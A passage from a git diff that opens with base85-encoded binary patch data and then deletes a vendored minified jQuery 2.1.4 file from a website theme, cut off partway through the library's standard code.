z_@7gN6<xgkWxl}RF9$$+09KCy%)8Py>j?n?3rbf*)!b+Dch(&jbE~mlNfhU6w<QDp
z5>$uraz2wyr~w6^EStD#@qT_Zedo=Hr1(&#Z}ZxIC57{sYe}AGJh|=CNy{!)9->B=
z`P|&ow6@ORcrTha6e7Y$gey?;6%D{|mXCc38qARM8q8>2K>WmWQ{HeMEN?xS^slPh
zS8^WJxULjntwzQbt}stt`iNGI>>3eQI4z76n8H$q)2jVq1=hYmfQ39b2pIRO0OPoj
ze*^fDDLbD+Cr?6Ba(DN0`>D@*T1K#Px^i$^EZDNr_Gq$Hur!mAm9FpyUpQ@kcLmSC
z-vxuPw^zZ-X6RGX(6A@dxF)OwMqcc`Lo)s=GBPqVGqa|qMu#VK!9}VGJ)`97z5DYM
zG`ik%0=G7{#D)`9h&g8LxTLfuI^UPb4HaXV^-GR`Z!6y98|+JgYUNSSK@*-eNixVK
zJgw*OAjQ9Z`*xM(g`Ahx^pKu8vau5xCrQhXi&D|CY%?2SVEL6MKwdi6L}ZEU71|TX
zF<5(JA(TA%Dx|nEiQrU96<0VE+01D|OZ`!c6k)iNzzE?i>gb$q^&hb>uB^0VndO;I
zf}gP+WUQ>L3=NsKz+$Z10vgpBZ$5qJh>=LtnGMj>yApSDaw3bGTx5>hg(mp*Ya1II
z8O1YF9Qj4O(m11x8*x_b5j4)I-BlY2_Km5%>FFZ8epP^_!k9DdXS2zt9_`Tzn<81`
zK*YU!A1fZ(mXCcY@Yvu}sj<27a(p%>uQ-H>wjh@~RfwO=WH{(cAU$u_r9McxOx(gY
zG~d3Q)jsJvz5P$beQrGXVWa>fIkZE2i<zgd8LDD{m2*Wly(_i1C3Mrat_XuQFWkrH
zW{e25lobhvS(!6cnxk`l#0V}E1g_#bA<UP2sOSzCxcPNPVm*bT8M(#Fm5ls|^oaeb
z!sgF~h10z09IvvovGLFwxmWaXl+|DdmZ~>v;M_MxNIaI)_HS-qE~Y76o?|t(6fI;}
zf@PLGZJR<BupyDinvqmX_IVdv@SI%r;MP7WBcW9~%20={%T|}?inx^HQwhynahu0(
z!;@I$*)TG^!@D6-=wf6z99b}9PRqH__6f9XV`KA7z&-%SHm@+rI|ZfgB`Bkq${H=5
z=Z4aJ@Gz^K+9*G4IS}oXr_c<vuR%^3h+L5n;9%*lp9`B`JRPGj=tJ^qG&q7ZiS?a>
zDWa%GWS`i-`L<yUok?(gML0J+Jlw<;`C<4@GDjK6iuzmD-2mEsI?ns)CJn@l%hh3H
zW*x)>zV+xwr0?Iq|6+X*lZU6f#V&*!3smRx3Rvu;OMX0WY%_uom^6{)HF%rdW8uHa
z*EplOge*}7ToV$eadzA-nffRtnVr7hugg-fD1zva09P3$q$U+hQTChxOcAGX`l6iX
z-Z##rez<1;8N!rp@X5O|*$H!^ce0OfnDJeIFnT9hn*sEFUFJ(PKV%(l__AU4%sUin
zlK<fBD+?}wdOAt`R;39Ib?08+)p2BiG58j)I+lohaRe>{yBW9eHLKRblqpp^esQ{P
zA%o)^^Nsr<-zcg|Eq5r5J`^nHz8o~IEcf}gYvOh`XB^>|Er?ngK|(iO8erTxLsWr<
zL5Y@q7;P)z$+A&rp8=E9ZyN8;OWVzVm^(*LbDaIU!)wYTzAghqArD@<|6ABmU{2SF
zXB3u{lvKu_4#bZIWgH!Z9qlep@jEW{r&Lvx=9lV*bfT3Q)X0v+8d5a=QwaMb*1aZc
zpVcDcis*=Cmkl~zDN0OCL`cXfD*hN5iFk%Wp}xB8;TW$l3vUU;*m-h?Cp3PVowfJ&
zuJ;Mmmy(gWuHdt^lx9~51k40ACm)}NH*en5*IO}PF0-sCEiP{GTBc5=j-ugwXlrX@
za|QqU-h{+Oz!lJ+-}Z5L7ov82&B{!ymn!^qCMz=&_F(l}6lYLzj)LcGN1l4rML>R;
z(AouvHxsb?Nk8oY77I<K4!Wn5a}yj++x;{y?xDALH@~*j*5>SNF5MBW=-o>i1t#%A
zV^wyWP_KpeRFwb;#Qvid{O>oP5yQ$NfIz+RoCo+v3C~MPN_KWII5apB2wa0$$afVa
z@>P%%0>QH;;&Or4Lr^`ozP|20Rw<&3+I*@&*jrauw^~zKSy|P74oeH=xa*9;3@tb+
z*Jn050tsUmB#!p*I6ptx9NsvbX%7ybdW&jO{rqlgbYvtCgxh@ggk`M!)&g>go9+*`
zEJJ?G)VZgzuGJodun1dM!+WWtxXJIl*kI}qs%mj;(FC$m!o0+MSXfwZ+%<PMw<P~A
z=;Pi6Gc&V1WVXDwVFf8jd0kqp?J&Q9E$@lDySrI$kx|Y=g;#FG7xokr(blHq8`Iv_
zcD;&4)YkZGJzgxh@$11u1sS(Jk!#8)av2HVSa?g86Hm#=U#Ilg>V_xeTl4>(ZarBY
zDa*>rI*wC#(U~e@bJO%hQc+RSfB!eRpf46{J~Ks*+Bkb795DjEurPsuS*E6@CKwFH
zap3y=`SX#%j}vd4)pbTW6%;*ZRqodLxw%moP;aYVNKImBXP2WL+GtT``5|PXuo8c$
z$owQWKHkdG(&I;ybg-=&8eMfv&jI9Sga=W<=*&#jP=~aPjK@q{D<IBZT9;uKY-!s=
zQ&TgJ$-~w4gV4G_nz4<|)Wn2<T?H9&eG(a$Z#a*?&(93!Y2W264e<TFUnc2|RO~V@
z<h?~}_2W0WK4-pGdiXni-Be3k+vKLNuN)&8+VA}IC?w?4W)&2%$i)@Dc=@$8rPd0N
z*N$}`(12>KCyt}y@9QwztE^9`C-ct)jJBWJCizMA*$Zst-qhnK<6Yf^-D}IqUjbzF
z?L0j6xxH3SS^o+nA{RMTkA9LPr2FdK`*s-)qU6GvZ7o%gWtJ{T`pnHHX*u5kNpI~q
zp2*<pCXRxD{?AjLcH__VvOnc49haeHSd*1uFt+$!q@K2|nx39sZdKmV?_Zsroj-p%
zrC6NIzk9;ZpSBl3F&)4cPP}k_b^@HV%B=6o(5va`yBg)yj~bP4amH$K^=I)-(kGEV
zaCFQsEfxH}tK+)KTRijL)!lun(W|JnN;>!a_ztq%Uv1hj7jWjq4W_rKsfSy$s=5^6
zkNvwNsi0e&-p+(FQWdm5AU)B%f`S6Tt_%lH#*zXh6ckzj<K2c>^WXc?G@`SWoysoj
z@$2p->XC(dKedjcBr*XN+NSpl+klzq@C;2)XX}AMmv0zl_Xw(zbUDTco#CwXRPURa
z4Udnf3xrhvpe1|O<cC{Dx1TYm$ReA$8Vd`xS_nre3g2QS@;2_00Sj+$9RdEKaGlnD
zKrA3b`a8X$$M=TqSlMY-Ha4|}SkJ?rXokY@8_#qVqo4Ek@OI2}5cbFLc+UzrG|!EI
zygp|ul6rl1V0v}K=m($xRMqBT-5`^YWx7bHjc)i$XDoKFtg5Zab56~|!Xi$&F=bRo
z<ZjF1mpt|6hwFl3Vo~do4NL^xQC}=%&SE$3%Rls|6=0v?2{Gj3<7+#dzY>;W)t(Rl
znBKySw!HVoizdCV<Kr&!cZTZR$2go7NSzzf!-Pm3zgFMGEO<`bJ{6wkoqxMM!j*nQ
z!$CZhh=}NMgP2|0J<IbnyP%`f-OmdhT7w8{l{zu>Ly`GWJfHw4%k@v6K9Q|{@*|<t
zOyO_@szRAj+10~WX?Oc;OT{g||7i9;yW$<ZHuZVbmbupxw>n}S10;=SsUG_)8yg;I
zw01RI9m>ZQ-d%k=iKaV7*Jr+mytih|d<lp(_6-ct;R?i#924*BYRwd+q-vc$v00<A
zukX)U3w4yn%<T`7()leD53;%o^hI5h<!>x1x}4{2WAl6>_oP2Xs0s5_sONL5d$CaQ
zgMFjI4id8|MR^X{-3L`a#~?h<K5&`>nZsU`&9b%;h`y#h6rhRh0P9#I<umN^U{;=_
zgKwBXYcM|ODZSoKZ*T9wz(D)ShCF*0*HzI=%>9R!krJFX^&abMYj2W25J>mFj2P=V
zd=0@=8_WCe3u`$&Rv5Y^=exrb-i|*%dEZ)S{ko<`f<~R0a1*Wbt4;ENgt-gkeM+sq
z*kFd){b_LaLuD;m^9i%upgmaLEl!i(kJGIA?c4pmm0@b$Cz2}I2=~#-J5TOs+u7(k
zHmoD*Iy2Y8Xq2kyUiW_w!i`wT%gc*=u&Y6kcYQEYI_gQnkdl(x*R6lRpB>D2Z%${q
zBD1(1lR&}S^Y2nycA6fnrHbBh>#k0H`EYd(y6wjOD58C3ef`~w`r7XyNZ+{#7LA73
z3PIvAFtZt@nF_Ky@~rEsFO`UGJP%?;5(3E^?AvcmUb8D)@K9*77%{Hl={%fgI};ie
zpKu`)<lcmhGE6rF4=@ar14$kH?U&xy>FGEe>^D7yruwwsnn*8>A3`5(ZfO~_9-~!o
zw8T1lTv}QxdZ!7Yd!8llJtUe;ImyRvbIDDIt2lVG^+5PTlto2xarFT)2`MLG#&WiQ
zWzR3tvi!nA(*DG(W7{BASrOJ}>G#s_JZ|CXN+2@p3)f)LtB%YapH)eT(gqA!*n!(o
zYy28SU29Pt^mN6ZB7CY^>5yf|E9Z)K{B;W_YUwES`C3&wZKqB?7x9lPETZAQRI6LG
z9VH9b<R9ivexVd>K~2eErAjO4uR8SHY_xfMZ+ml>qwEq^bd_9A{EPKuS3KBBIq1|U
zFt9ZnLY~vb`o0+|(9XZCjKJczh>}U2-*83TL+R!{R>&3Y%~!p_{N&X{!|q`EeV}ft
zWDGvtj{5xl8biIu+~?(Yte0bBV~gLfPt^woEn*zUgTZu^w-R%7c*^_ReYW%OAAKPY
zSJ&hxIdijZ3zq|PhIKate5K@(Evz;VcF|fa`V`N6TdB)e-%8g+;90*B%L(TxhKR_Z
zqc0rc`dHuyOpDWA&gbGM?By3)6W%T1C~5g^qOuO=%q{0wQV*qM*HIS`EQ^Qb2+(EM
z2WV%5BfiZfit2hU=Iy4^aK&->QdoN`$|hoCiRvHpPkxn9QoPq%P-W6xOLMir&lTsY
zBxV8Xr43bye7++PEVDFq{q%)x-ct8rj5}R0W%H(Z7L=RiaXqylXX@=#`S}rh&mWpl
ziM)JhJ;}k$*SI}j`pX^LK2XCEt^4HHUsJaO7h!>b(z3Glqo3^YSElvpZlBj62liiX
znK5h~E$1wcgOh#uBk=KuXzmNxzg?PjoWN-ek(@+Ee9wT$WYgf8_lj+%#aHrR#sxP!
zy12Njmo|9k=-IPpdIB@>Q~mGdKAoe7jexTRJ2{;f)qYC~Fs$rKRd&CYl~UwZYA0DK
z-*Vd`XB)N#WXjxA!c_Ew)A0+rNR*+@6$Pzxmh}JaGXFCYUY*8}POBC}5%yE68J@8C
z@x9kqvZbY^MD6he&iLNvnVGArtHMbA)r}42BPWKHWQCgzBE7WJ$zArn@{8(tr>xqf
zVElRDx9^8le7|sM0(to7+|&`XxdjE?v$R7?WrNbz!5=L%%uJo5Dlt5$C^coL%QqGa
z82$Nls962^)GXN9x<j@FexnS%vb=8%<GziK9)DD0n729E8S!eF>>J@G*Y^~ckQf>r
zby9ERr``GVlQ2|maSeyhspr9QECOXO4F}X-z3pY&c1EROaR5hreEgHjQ_7dLI4j=_
z{SiB>$B6Qs5{{fOyR`U3fky19zEsW*?`N7?^Q8Xng)bHx{odH(Mf`RFSa}CoEEGX3
zp{mN@OCn7dLZ4OQrj8%VA1*Rl7{9y0@Z$w(mUkzHS67s}<=6<rlCL`?D>GD)dt&0-
z;$*PNGzn3Wlz@EfPph?SI!VlPvTfT@B)t}9)5hqatK^h*YpO^{qwtZ$Od)A|QhdLj
z+qE#=y}cI-t|wi6i>BSC68LlsB_Yf_^qmS{Ur|6{2eAYl;O<uJXF@5xv^%bA7~Pm9
z{;qb{p$|1F*uyOc$||6_0Z(*vJsKVxJJ@L6yiMN*6a+&<L($RXn|7;Yy`dymz6^5)
z?tPuCbN_M6(_s5xCb$faYp(H%1D;x6-dN%BsL05-=oycapXr3fM?h_4Rc`IT?dv1O
zR#95o72?g8L(8rN)ValP*QwtfD*J5Z-ai6L`=-;N<ogVZtm3Kq;dfEesGPw4TT^D^
z4u;*Io6G4AbSUtufyQ=L^gPQCe^v0XyXN4e3$~e}uP>E6h%TvkdFw7j=el-rpV60V
z=56-|$bw{e!YWx26vb4E3qquI%n*J%jIjD#lKb#sjOwPb;?WzrBR9clHNp%K{v_P(
zLNy_8OU>(ehf9Aq9%Xbjmb30fbGS^COx;Y1yoApuk|xLPx1Vr!c@6+2TqDX>>Db08
zcjCAVu~x&qqC67_J*xS>-S~{%yzS<$yJvl;NihE8p3>49g^3vm6?*P@VJ!k6<<r^T
zvZKT*{Qje-R{;YyH=LxlXy$DkNNbe_>E;n-<mMg_gl3ZAcW`b4D8bI(p9E>V*s#+i
zUX)z+{XYGlrI@bVRX*DHr&JYD11*J%%f7IEqnx0IH3O!?(;Yt~@tUh~t-QE)y955{
ze{|85qWc&ONi#AsI@el!cZEj|H-0ofVHT+=qU$d@ZMg<`b%aRpDC`&ly=cyPvHdT%
z<2UQ9z&%t&I?;BPR?z;e+UrV<U5$LC9sWqnEn|@|%J|Y+RF+M`S<(;4_~D44sktW^
zQ+3dIBgur=#I<ha^KHgDeN2dY@grRKph#cP+^6Li<Mn7e0|P3Yiq0kdIpEQW@lm+D
z=#~d3qtuG$0J>*Ck8x|Oc3B9CtFc-oWdUmq`I-By;o`n7n~B`o<0nCdTOA!8-BC3D
zetx%YY@P&Y4MT{Dy2-dAIna}}D+}?;mg*Jd<&^5$zo|)?D|;Z)smhkQI)$xnV(+=w
zre<bnc6&Q`*BD9t4>nT5R#)9@!;XZq>sXz!=cgZC&xePG^7mvE6=NmgaQMxrfi$t+
z_VgIctaiO-7o0=w*W(9kqbtr|RMYpPHS%j~85JWuV%|B5(<&9IXRq~sz3b`(j(D{{
zC~`8Z7;(u^P0yHxqx3~ifh4RqX!}7J7;>uq_5Jgdl!0s!u{8Kc{vO81*AQPCxanF-
zSG1*-Qs1tfMPw)4;U@M=-}=R-(f^qEo$RdL9{0Tai^S^5#L%FJtEY?4jDDJ?di#IX
zKO}#_(re$+3MBQ9_>enhXPL15>@L>pR8&-~*T2x4-?*_n`ZV>^P*F}$rcmT9l3gme
z9!)PoRnSYn5IndbaVx<Te)PssrATKp_wuW-Em2BhQJ<FW+*eFQnS52OsS--4TJOP$
zD19?)Z2pUo(<^C@AYlt~vISnhSzx5_zMg{XJ8onGLbK`nzDs>ntJ?K`E`vLaF1fAy
z%r663^&mywVa{-&XoTj*Ch~TEQZI>q-aVmirP3^hiM^Bdiboo1>+}l3k8>o<*HcF2
z>Xj%eTT>sUvazu(lC}le<oo2p#lt2Iz+R4%EYG=}XX%r{R*ct(^0=M-$&bVi75{25
zWA0NLDX1>1V%QNJY7u3e4?R@(^}^-jfnIZH1#oZt=jQYOuNnQ1u60uUX%ztxL9qDs
V0M34I?TbI9bTth%D%I>m{|g0bq80!E

diff --git a/website/src/themes/kube/static/js/jquery-2.1.4.min.js b/website/src/themes/kube/static/js/jquery-2.1.4.min.js
deleted file mode 100644
index 6f435540f0..0000000000
--- a/website/src/themes/kube/static/js/jquery-2.1.4.min.js
+++ /dev/null
@@ -1,5 +0,0 @@
-/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
-!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){return!n.isArray(a)&&a-parseFloat(a)+1>=0},isPlainObject:function(a){return"object"!==n.type(a)||a.nodeType||n.isWindow(a)?!1:a.constructor&&!j.call(a.constructor.prototype,"isPrototypeOf")?!1:!0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=l.createElement("script"),b.text=a,l.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=s(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:g.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=s(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(e=d.call(arguments,2),f=function(){return a.apply(b||this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function s(a){var b="length"in a&&a.length,c=n.type(a);return"function"===c||n.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C=1<<31,D={}.hasOwnProperty,E=[],F=E.pop,G=E.push,H=E.push,I=E.slice,J=function(a,b){for(var c=0,d=a.length;d>c;c++)if(a[c]===b)return c;return-1},K="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",L="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",N=M.replace("w","w#"),O="\\["+L+"*("+M+")(?:"+L+"*([*^$|!~]?=)"+L+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+N+"))|)"+L+"*\\]",P=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+O+")*)|.*)\\)|)",Q=new RegExp(L+"+","g"),R=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),S=new RegExp("^"+L+"*,"+L+"*"),T=new RegExp("^"+L+"*([>+~]|"+L+")"+L+"*"),U=new RegExp("="+L+"*([^\\]'\"]*?)"+L+"*\\]","g"),V=new RegExp(P),W=new RegExp("^"+N+"$"),X={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),TAG:new RegExp("^("+M.replace("w","w*")+")"),ATTR:new RegExp("^"+O),PSEUDO:new RegExp("^"+P),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+L+"*(even|odd|(([+-]|)(\\d*)n|)"+L+"*(?:([+-]|)"+L+"*(\\d+)|))"+L+"*\\)|)","i"),bool:new RegExp("^(?:"+K+")$","i"),needsContext:new RegExp("^"+L+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+L+"*((?:-\\d)?\\d*)"+L+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,aa=/[+~]/,ba=/'|\\/g,ca=new RegExp("\\\\([\\da-f]{1,6}"+L+"?|("+L+")|.)","ig"),da=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)},ea=function(){m()};try{H.apply(E=I.call(v.childNodes),v.childNodes),E[v.childNodes.length].nodeType}catch(fa){H={apply:E.length?function(a,b){G.apply(a,I.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function ga(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],k=b.nodeType,"string"!=typeof a||!a||1!==k&&9!==k&&11!==k)return d;if(!e&&p){if(11!==k&&(f=_.exec(a)))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return H.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName)return H.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=1!==k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(ba,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+ra(o[l]);w=aa.test(a)&&pa(b.parentNode)||b,x=o.join(",")}if(x)try{return H.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function ha(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function ia(a){return a[u]=!0,a}function ja(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function ka(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function la(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function pa(a){return a&&"undefined"!=typeof a.getElementsByTagName&&a}c=ga.support={},f=ga.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=ga.setDocument=function(a){var b,e,g=a?a.ownerDocument||a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=g.documentElement,e=g.defaultView,e&&e!==e.top&&(e.addEventListener?e.addEventListener("unload",ea,!1):e.attachEvent&&e.attachEvent("onunload",ea)),p=!f(g),c.attributes=ja(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ja(function(a){return a.appendChild(g.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(g.getElementsByClassName),c.getById=ja(function(a){return o.appendChild(a).id=u,!g.getElementsByName||!g.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ca,da);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(ca,da);return function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return"undefined"!=typeof b.getElementsByTagName?b.getElementsByTagName(a):c.qsa?b.querySelectorAll(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(g.querySelectorAll))&&(ja(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a><select id='"+u+"-\f]' msallowcapture=''><option selected=''></option></select>",a.querySelectorAll("[msallowcapture^='']").length&&q.push("[*^$]="+L+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+L+"*(?:value|"+K+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").length||q.push(".#.+[+~]")}),ja(function(a){var b=g.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ja(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",P)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===g||a.ownerDocument===v&&t(v,a)?-1:b===g||b.ownerDocument===v&&t(v,b)?1:k?J(k,a)-J(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,h=[a],i=[b];if(!e||!f)return a===g?-1:b===g?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?la(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},g):n},ga.matches=function(a,b){return ga(a,null,null,b)},ga.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return ga(b,n,null,[a]).length>0},ga.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},ga.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&D.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},ga.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},ga.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=ga.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return 